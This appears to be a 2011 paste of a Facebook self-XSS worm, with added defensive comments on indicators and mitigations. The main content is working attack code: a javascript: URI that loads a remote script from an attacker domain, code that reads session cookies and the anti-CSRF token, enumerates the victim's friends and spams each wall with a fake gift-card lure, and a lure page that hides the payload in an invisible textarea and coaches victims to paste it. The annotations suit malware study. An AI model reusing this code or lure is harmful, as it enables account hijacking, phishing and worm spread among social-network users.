Xylitol

Facebook worm again..

May 17th, 2011
  // Delivery vector (self-XSS): a javascript: URI that the lure page (index.html, further
  // down in this paste) asks the visitor to copy and paste into the browser address bar.
  // It creates a <script> element, points its src at the protocol-relative facehax.js URL,
  // and appends it to document.body, so the remote script executes inside whatever page is
  // open in that tab, with that page's origin and session. The trailing void(0) keeps the
  // browser from navigating to the expression's result.
  // Defensive note: no server-side flaw is involved; the user is tricked into running the
  // code. Browsers later added mitigations such as stripping the "javascript:" scheme from
  // text pasted into the address bar.
  1. vector: javascript:(a=(b=document).createElement('script')).src='//ablingla.com/face/facehax.js',b.body.appendChild(a);void(0)
  2.  
  3. facehax.js:
  // Shortened URL that the posting loop later attaches to every wall post as the
  // action-link href. The final destination behind the shortener is not visible in this
  // sample; treat the short URL itself as an indicator.
  4. var thelink = "http://is.gd/9d3AE0";
  5.  
  // readCookie(name): looks up one cookie by name in document.cookie.
  // Splits the cookie string on ';', strips leading spaces from each entry, and returns the
  // text after "name=" for the first entry that starts with it; returns null if none does.
  // The value is returned exactly as stored (no decoding is applied).
  // Security relevance: document.cookie only exposes cookies that are not flagged HttpOnly,
  // so this helper can read script-visible cookies only. The sample calls it for "c_user".
  6. function readCookie(name) {
  7.     var nameEQ = name + "=";
  8.     var ca = document.cookie.split(';');
  9.     for (var i = 0; i < ca.length; i++) {
  10.        var c = ca[i];
  11.        while (c.charAt(0) == ' ') c = c.substring(1, c.length);
  12.        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length)
  13.    }
  14.    return null
  15. }
  // Setup: collects what the injected script needs from the victim's own page.
  // randomnumber, user_id and user_name are computed here but are not referenced again in
  // the visible sample (the requests below use uid instead of user_id).
  16. var randomnumber=Math.floor(Math.random()*99999);
  17. var user_id = readCookie("c_user");
  18. var user_name = document.getElementById('navAccountName').innerHTML;
  // Lure strings that end up in every wall post; both are stable text indicators for
  // content filtering and for searching already-posted spam.
  19. var message = "jetBlue is giving out 32 more $1,000 gift cards, simply click Gimme my gift card below to get yours!";
  20. var myText = "GIMME MY GIFT CARD GIMME MY GIFT CARD GIMME MY GIFT CARD GIMME MY GIFT CARD GIMME MY GIFT CARD GIMME MY GIFT CARD GIMME MY GIFT CARD\n";
  21.  
  // post_form_id and fb_dtsg are read from form fields already present in the page and are
  // replayed in the POST body further down. fb_dtsg is commonly documented as Facebook's
  // anti-CSRF token: because this script runs inside the page's own origin it can simply
  // read the token, which is why CSRF tokens do not protect against self-XSS.
  22. var post_form_id = document.getElementsByName('post_form_id')[0].value;
  23. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  // The inner match() captures the digits after "c_user="; the outer match() then searches
  // the cookie string for those digits again, so uid is a match array that stringifies to
  // the numeric id when concatenated into the URL. If no c_user cookie is present the inner
  // match() returns null and this line throws, which stops the script before any request.
  24. var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  25.  
  // Friend enumeration: one synchronous (third argument false), same-origin GET to the
  // typeahead endpoint with viewer=<uid>; Math.random() is appended as a cache-buster.
  // Being same-origin, the request carries the victim's session automatically.
  // gf and data are assigned without var and therefore become globals on the page.
  26. var friends = new Array();
  27. gf = new XMLHttpRequest();
  28. gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
  29. gf.send();
  30. if(gf.readyState!=4){ }else{
  // substr(9) drops the first nine characters of the response before parsing; presumably
  // this is the "for (;;);" anti-JSON-hijacking prefix (nine characters), TODO confirm
  // against a captured response. The remainder is parsed with eval() rather than a JSON
  // parser.
  31.        data = eval('(' + gf.responseText.substr(9) + ')');
  32.        if(data.error){ }else{
  // Keeps the entries list ordered by each entry's index field; on error, or if the
  // request did not complete, friends stays empty and the posting loop does nothing.
  33.                friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
  34.        }
  35. }
  // Propagation loop: one asynchronous POST per entry in friends, all sent to the same
  // feed-prompt endpoint from inside the victim's session.
  // Detection notes for this sample: the body carries a fixed app_id and template_id, the
  // replayed post_form_id / fb_dtsg values, the shortened link, and the two lure strings,
  // and a single page load produces a burst of near-identical POSTs that differ only in
  // to_ids[0]. Those constants and that burst pattern are what to look for in proxy or
  // server logs.
  36. for(var i=0; i<friends.length; i++){
  37.        var httpwp = new XMLHttpRequest();
  38.        var urlwp = "/fbml/ajax/prompt_feed.php?__a=1";
  39.        var paramswp = "&__d=1&app_id=6628568379&extern=1&" +
  40.                                   "&post_form_id=" + post_form_id +
  41.                                   "&fb_dtsg=" + fb_dtsg +
  42.                                   "&feed_info[action_links][0][href]=" + encodeURIComponent(thelink) +
  43.                                   "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
  44.                                   "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
  45.                                   "&user_message=" + message;
  46.        httpwp.open("POST", urlwp, true);
  47.        httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  // Content-length and Connection are on the XMLHttpRequest forbidden-header list, so
  // compliant browsers refuse to set them from script; the browser supplies its own values.
  48.        httpwp.setRequestHeader("Content-length", paramswp.length);
  49.        httpwp.setRequestHeader("Connection", "keep-alive");
  // The completion handler is empty: the script never inspects whether a post succeeded.
  50.        httpwp.onreadystatechange = function(){
  51.                if (httpwp.readyState == 4 && httpwp.status == 200){
  52.                      
  53.                }
  54.        }
  55.        httpwp.send(paramswp);
  56. }
  57.  
  // Final stage: shows a "WINNER" dialog and then navigates the tab away to a static site
  // hosted on an S3 website endpoint. What that site serves is not part of this paste; the
  // hostname is an indicator for this campaign. alert() blocks until dismissed, while the
  // asynchronous POSTs above have already been handed to the browser.
  58. alert("WINNER! Click OK to Continue..");
  59. window.location = "http://appboxkm.info.s3-website-us-east-1.amazonaws.com/";
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66.  
  67.  
  68.  
  69. ----------
  70. index.html:
  71. <!doctype html>
  72. <!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
  73. <!--[if IE 7 ]>    <html lang="en" class="no-js ie7"> <![endif]-->
  74. <!--[if IE 8 ]>    <html lang="en" class="no-js ie8"> <![endif]-->
  75. <!--[if IE 9 ]>    <html lang="en" class="no-js ie9"> <![endif]-->
  76. <!--[if (gt IE 9)|!(IE)]><!--><html lang="en" class="no-js"> <!--<![endif]-->
  77. <head>
  78. <meta charset="utf-8"/>
  79. <title></title>
  <!-- Lure styling. The "textarea, a" rule positions those elements absolutely at the
       top-left of their container and sets opacity to 0.01 (with the IE/khtml/moz
       equivalents), so the textarea that holds the javascript: URI is present, focusable
       and selectable but practically invisible to the visitor. -->
  80. <style type="text/css">
  81. html * {margin: 0; padding: 0;}       body {width: 520px; margin: 0 auto; font-family: "lucida grande",tahoma,verdana,arial,sans-serif; font-size: 14px;}       textarea, a {font-size: 24px; text-align: center; position: absolute; top: 0; left: 0; width: 401px; height: 20px; filter: alpha(opacity=1); -khtml-opacity: 0.01; -moz-opacity: 0.01; opacity: 0.01; cursor: pointer;}       li {margin: 5px;}       ol {list-style: decimal;}
  82. </style>
  83. <!--[if lt IE 9]><script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
  84. </head>
  85. <body>
  86. <br>
  87.  
  88.  
  <!-- Social-engineering panel dressed up as a "Security Check". #button is the only
       visible control. #key starts hidden (display: none) and contains the keystroke
       instructions plus the near-invisible textarea #c, whose content is the javascript:
       URI that loads facehax.js.
       The instructed sequence is: CTRL+C copies the pre-selected textarea content, ALT+D
       moves focus to the browser address bar, CTRL+V and Enter paste and run the URI in
       the top-level page.
       NOTE(review): the script only works when the top-level page is the social network
       itself, so this lure is presumably shown framed inside such a page (for example an
       application or page tab); confirm from the delivery context.
       User-awareness takeaway: a page that asks for keyboard shortcuts ending in a paste
       into the address bar is a self-XSS lure. -->
  89. <div style="background: url('http://1.bp.blogspot.com/-mPStXUBwF8Y/TcDklWEtieI/AAAAAAAAAAs/_EdzOJvct6E/s1600/bg1.png') no-repeat top left; width: 485px; height: 335px; padding: 15px 0 0 20px;">
  90.     <p style="color: white; font-weight: 700;">
  91.         Security Check
  92.     </p>
  93.     <p style="font-size: 11px; padding-top: 15px">
  94.         Please complete our new <strong>5 second</strong> security check to get your gift card.
  95.     </p>
  96.     <div id="container" style="margin-top: 40px;">
  97.  
  98.         <p id="button" style="cursor: pointer; color: white; font-weight: 700; background-color: #8298c0; width: 150px; height: 20px; text-align: center; padding: 10px; border: solid 1px #4e6fa7; margin: 0 auto;">
  99. Get your gift card        </p>
  100.         <div id="key" style="display: none; width: 401px; margin: 0 auto;">
  101.             <ol style="padding-left: 10px; font-size: 12px">
  102.                 <strong>Press the following keys on your keyboard in order:</strong><br><br>
  103.                 <li>Press <strong>CTRL + C</strong></li>
  104.                 <li>Press <strong>ALT + D</strong></li>
  105.  
  106.                 <li>Press <strong>CTRL + V</strong></li>
  107.  
  108.                 <li>Press <strong>Enter</strong></li>
  109.                 <li><strong>Get your $1,000 gift card</strong></li>
  110.             </ol>
  111.             <div id="cd" style="position: relative; width: 401px; height: 20px; margin-left: -30px;">
  112.               <textarea id="c">javascript:(a=(b=document).createElement('script')).src='//ablingla.com/face/facehax.js',b.body.appendChild(a);void(0)</textarea>
  113.  
  114.             </div>
  115.         </div>
  116.  
  117.     </div>
  118.  
  119.  
  120. </div>
  <!-- Loads jQuery 1.5.2 over plain HTTP, then wires the click handler for #button:
       it hides the button, reveals the #key instructions, and focuses and selects the
       textarea #c. Pre-selecting the textarea is what makes the instructed CTRL+C copy
       the javascript: URI without the visitor ever seeing it. -->
  121. <script type="text/javascript" src="http://code.jquery.com/jquery-1.5.2.min.js"></script>
  122. <script type="text/javascript">       $(document).ready(function() {         $("#button").click(function(){           $("#button").css("display","none");           $("#key").css("display","block");           $("#c").focus();           $("#c").select();         });       });     </script>
  <!-- Third-party visitor counter: pushes an identifier tuple onto the wau_p queue and
       asynchronously loads a_pro.js from widgets.amung.us into <head>. This appears to be
       a traffic-statistics widget the operator used to count lure-page visits.
       NOTE(review): the two identifiers in the tuple and in the script id may help link
       other lure pages run by the same operator; verify before relying on them. -->
  123.   <script type="text/javascript" id="wau_scr_53bb8237">
  124.     var wau_p = wau_p || []; wau_p.push(["4cyr", "53bb8237", false]);
  125.     (function() {
  126.         var s=document.createElement("script"); s.type="text/javascript";
  127.         s.async=true; s.src="http://widgets.amung.us/a_pro.js";
  128.         document.getElementsByTagName("head")[0].appendChild(s);
  129.     })();
  130. </script></body>
  131.  
  132. </html>
  <!-- Script reference placed after the closing </html> tag and loaded from an S3 path
       named "statichtmlapp". NOTE(review): presumably appended by the service that hosted
       the page rather than written by the lure's author; confirm before treating it as
       part of the sample. -->
  133. <script src = 'https://s3.amazonaws.com/statichtmlapp/scrollbar.js' > </script>